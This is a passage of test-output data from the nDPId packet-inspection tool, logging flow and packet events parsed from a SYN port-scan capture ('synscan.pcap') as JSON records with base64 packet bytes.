+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/DUAAC0GHz2sEAAIQA2GNIzTE5HdU4MZAAAAAGACCAAc+wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACcG5gysEAAIQA2GNIzTGiTdU4MZAAAAAGACEAAOaAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsqMAAACwGc7KsEAAIQA2GNIzTJ+fdU4MZAAAAAGACBAAMpQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlMAACYG5B+sEAAIQA2GNIzTHcvdU4MZAAAAAGACDAAOwQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADgGgXusEAAIQA2GNIzTBA\/dU4MZAAAAAGACBAAwfQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNkAADgG+5msEAAIQA2GNIzTAmjdU4MZAAAAAGACBAAyJAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/MAAADIGGbKsEAAIQA2GNIzTJyndU4MZAAAAAGACDAAFYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs4i0AAC4GOEWsEAAIQA2GNIzTDSvdU4MZAAAAAGACDAAfYQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYYAADoGgOysEAAIQA2GNIzT1w\/dU4MZAAAAAGACDABVfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs45YAADgGLNysEAAIQA2GNIzTBE7dU4MZAAAAAGACBAAwPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAsjPEAADMGiIGsEAAIQA2GNIzSFa7dUoMYAAAAAGACEAAS4QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAstTEAADcGXEGsEAAIQA2GNIzSCk7dUoMYAAAAAGACEAAeQQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAskyUAADIGg02sEAAIQA2GNIzSAgPdUoMYAAAAAGACDAAqjAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zgAADYGFzqsEAAIQA2GNIzSAivdUoMYAAAAAGACDAAqZAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs0mIAADUGQRCsEAAIQA2GNIzSA3DdUoMYAAAAAGACCAAtHwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsh+cAACgGmIusEAAIQA2GNIzSBtvdUoMYAAAAAGACBAAttAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADkGkCasEAAIQA2GNIzSwAfdUoMYAAAAAGACCABwhwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsmKkAACcGiMmsEAAIQA2GNIzSID7dUoMYAAAAAGACEAAIUQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsn+QAACsGfY6sEAAIQA2GNIzSBELdUoMYAAAAAGACEAAkTQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAs98kAADAGIKmsEAAIQA2GNIzSDPzdUoMYAAAAAGACBAAnkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsrp0AADMGZtWsEAAIQA2GNIzSB9DdUoMYAAAAAGACEAAgvwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAspjMAADMGbz+sEAAIQA2GNIzSw1PdUoMYAAAAAGACEABlOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsGwkAADUG+GmsEAAIQA2GNIzSJT\/dUoMYAAAAAGACCAALUAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDkAADYG9jmsEAAIQA2GNIzSAKHdUoMYAAAAAGACDAAr7gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+cAADIGfousEAAIQA2GNIzSIyjdUoMYAAAAAGACDAAJZwAAAgQFtA=="} 